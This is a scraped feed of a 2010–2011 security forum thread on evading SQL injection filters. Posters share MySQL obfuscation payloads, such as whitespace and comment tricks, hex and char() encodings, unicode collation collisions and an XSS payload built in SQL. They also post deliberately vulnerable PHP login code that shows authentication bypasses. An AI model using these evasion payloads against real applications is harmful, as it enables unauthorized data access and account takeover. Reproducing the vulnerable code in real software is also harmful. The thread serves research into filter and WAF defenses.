SQL filter evasion Just released a small walkthrough for some filters: http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/ I would love to see a lot more about SQL filter evasion/obfuscation in this forum although I have to admit that JS is just designed for obfuscation. http://sla.ckers.org/forum/read.php?24,33903,33903#msg-33903 Wed, 22 May 2013 11:23:34 -0500 Phorum 5.2.15a http://sla.ckers.org/forum/read.php?24,33903,36567#msg-36567 Re: SQL filter evasion http://sla.ckers.org/forum/read.php?24,33903,36567#msg-36567 Gareth Heyes Obfuscation Thu, 23 Jun 2011 18:18:11 -0500 http://sla.ckers.org/forum/read.php?24,33903,36566#msg-36566 Re: SQL filter evasion http://sla.ckers.org/forum/read.php?24,33903,36566#msg-36566
SELECT \Nfooooobar_123

nice for confusion:

SELECT\NOTHING]]> Reiners Obfuscation Thu, 23 Jun 2011 17:25:20 -0500 http://sla.ckers.org/forum/read.php?24,33903,36056#msg-36056 Re: SQL filter evasion http://sla.ckers.org/forum/read.php?24,33903,36056#msg-36056
[hackvertor.co.uk]]]> Gareth Heyes Obfuscation Mon, 21 Mar 2011 07:49:49 -0500 http://sla.ckers.org/forum/read.php?24,33903,36055#msg-36055 Re: SQL filter evasion http://sla.ckers.org/forum/read.php?24,33903,36055#msg-36055
%S%E%L%E%C%T 1

Basically, you can add the percentage sign in between characters and the query is still valid.]]> lightos Obfuscation Mon, 21 Mar 2011 04:18:07 -0500 http://sla.ckers.org/forum/read.php?24,33903,35053#msg-35053 Re: SQL filter evasion http://sla.ckers.org/forum/read.php?24,33903,35053#msg-35053

- functions can be called with lots of spaces before parenthesis: SELECT ascii (1)
- there can be a lot of bullshit in this part and the syntax is still valid:
select(name) `bullshit bullshit bullshit`from users
select name `bullshit bullshit bullshit` from users
- this works as well:
select`name`buuullshit from users
select name buuullshit from users

edit:
just to have it in this thread:
SQLi filter evasion cheatsheet for MySQL]]> Reiners Obfuscation Mon, 12 Jul 2010 17:34:54 -0500 http://sla.ckers.org/forum/read.php?24,33903,34442#msg-34442 Re: SQL filter evasion http://sla.ckers.org/forum/read.php?24,33903,34442#msg-34442 http://websec.wordpress.com/2010/05/07/exploiting-hard-filtered-sql-injections-2-conditional-errors/]]> Reiners Obfuscation Fri, 07 May 2010 04:27:15 -0500 http://sla.ckers.org/forum/read.php?24,33903,34101#msg-34101 Re: SQL filter evasion http://sla.ckers.org/forum/read.php?24,33903,34101#msg-34101 SW Obfuscation Sun, 11 Apr 2010 02:14:52 -0500 http://sla.ckers.org/forum/read.php?24,33903,34039#msg-34039 Re: SQL filter evasion http://sla.ckers.org/forum/read.php?24,33903,34039#msg-34039 SELECT/*/'a'/*/ 'd'/*/ 'mi'/*/ 'n']]> Anonymous User Obfuscation Fri, 02 Apr 2010 16:58:40 -0500 http://sla.ckers.org/forum/read.php?24,33903,34038#msg-34038 Re: SQL filter evasion http://sla.ckers.org/forum/read.php?24,33903,34038#msg-34038 SELECT concat(char(0x70617373),char(2003792484)) ]]> Anonymous User Obfuscation Fri, 02 Apr 2010 16:24:40 -0500 http://sla.ckers.org/forum/read.php?24,33903,33936#msg-33936 Re: SQL filter evasion http://sla.ckers.org/forum/read.php?24,33903,33936#msg-33936 
SELECT xmlelement(name img,xmlattributes(1as src,'a\l\x65rt(1)'as \117n\x65rror))
]]> Anonymous User Obfuscation Tue, 23 Mar 2010 08:35:04 -0500 http://sla.ckers.org/forum/read.php?24,33903,33929#msg-33929 Re: SQL filter evasion http://sla.ckers.org/forum/read.php?24,33903,33929#msg-33929 
SELECT--/*!500005#*//*!400004#*//*!300003#*/
]]> Anonymous User Obfuscation Sun, 21 Mar 2010 15:46:08 -0500 http://sla.ckers.org/forum/read.php?24,33903,33917#msg-33917 Re: SQL filter evasion http://sla.ckers.org/forum/read.php?24,33903,33917#msg-33917
I have two users with the same name in the DB, manes and mÁnes, both have different passwords. The query goes something like this:
$userrow = mysql_query("SELECT user FROM `Test` WHERE `user` = '" . mysql_real_escape_string($_POST['username']) . "' AND `passwd` = '" . md5($_POST['password']) . "';");
if(mysql_num_rows($userrow) != "1"){
echo "<font color='red'><b>Wrong username or password!</b></font>";
include "login.php";
} else {
$_SESSION['user'] = $_POST['username'];
header('Location: index.php');
}

If I log in with username manes, but using the password for mÁnes, it will log me in as the original manes. I tried adding DISTINCT, LIMIT 1, ORDER BY to circumvent this, but it only seemed to affect the results I got through MySQL console, my web app remained vulnerable. I went on to test this with another PHP app I downloaded, similar query:

$qry="SELECT * FROM members WHERE login='$login' AND passwd='".md5($_POST['password'])."'";
$result=mysql_query($qry);
//Check whether the query was successful or not
if($result) {
if(mysql_num_rows($result) == 1) {
//Login Successful

But this time, it didn't matter which username I used (manes/mÁnes), it logged my in by the password I used... Also, SMF 1.1 allowed me to register both users, however would only let me log onto my original one.]]> lightos Obfuscation Sat, 20 Mar 2010 13:24:55 -0500 http://sla.ckers.org/forum/read.php?24,33903,33916#msg-33916 Re: SQL filter evasion http://sla.ckers.org/forum/read.php?24,33903,33916#msg-33916 not in SQL but hardcoded in the app: 

<?php
// register.php

$user = mysql_real_escape_string($_GET['user']);
$pass = mysql_real_escape_string($_GET['pass']);

if(trim($user) == "admin")
{
	exit("admin already exists");
} 

$result = mysql_query("INSERT INTO users (name, pass) VALUES ('".$user."','".$pass."'");
?>

<?php
// admin.php

$pass = mysql_real_escape_string($_GET['pass']);

$result = mysql_query("SELECT * FROM users WHERE user = 'admin' AND pass = '".$pass."'");

if($data = @mysql_fetch_array($result))
{
	echo "Welcome admin";
}
?>

but unlike stefan essers column truncation attack this will not work when the username is checked against the database.]]> Reiners Obfuscation Sat, 20 Mar 2010 10:15:41 -0500 http://sla.ckers.org/forum/read.php?24,33903,33908#msg-33908 Re: SQL filter evasion http://sla.ckers.org/forum/read.php?24,33903,33908#msg-33908 
SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))
]]> Anonymous User Obfuscation Fri, 19 Mar 2010 12:52:30 -0500 http://sla.ckers.org/forum/read.php?24,33903,33907#msg-33907 Re: SQL filter evasion http://sla.ckers.org/forum/read.php?24,33903,33907#msg-33907 http://dev.mysql.com/doc/refman/5.1/en/charset-unicode-sets.html 

SELECT 'Ä'='A'; #1
SELECT 'Ã'='A'; #1

SELECT * FROM test WHERE name = 'ädM&#1031;&#328;'; //imagine entities in canonical form

SELECT*FROM(test)WHERE(name)IN(_ucs2 0x01df010e004d00cf0148);
]]> Anonymous User Obfuscation Fri, 19 Mar 2010 12:45:29 -0500 http://sla.ckers.org/forum/read.php?24,33903,33905#msg-33905 Re: SQL filter evasion http://sla.ckers.org/forum/read.php?24,33903,33905#msg-33905
Quote

I would love to see a lot more about SQL filter evasion

INSERT INTO contests (contest) VALUES('crazy contest ideas')

#Found no rows
SELECT COUNT(*) FROM contests WHERE ContestType = 'SQL' AND User = 'Reiners']]> Gareth Heyes Obfuscation Fri, 19 Mar 2010 11:12:51 -0500 http://sla.ckers.org/forum/read.php?24,33903,33903#msg-33903 SQL filter evasion http://sla.ckers.org/forum/read.php?24,33903,33903#msg-33903 http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/
I would love to see a lot more about SQL filter evasion/obfuscation in this forum although I have to admit that JS is just designed for obfuscation.]]> Reiners Obfuscation Fri, 19 Mar 2010 09:55:43 -0500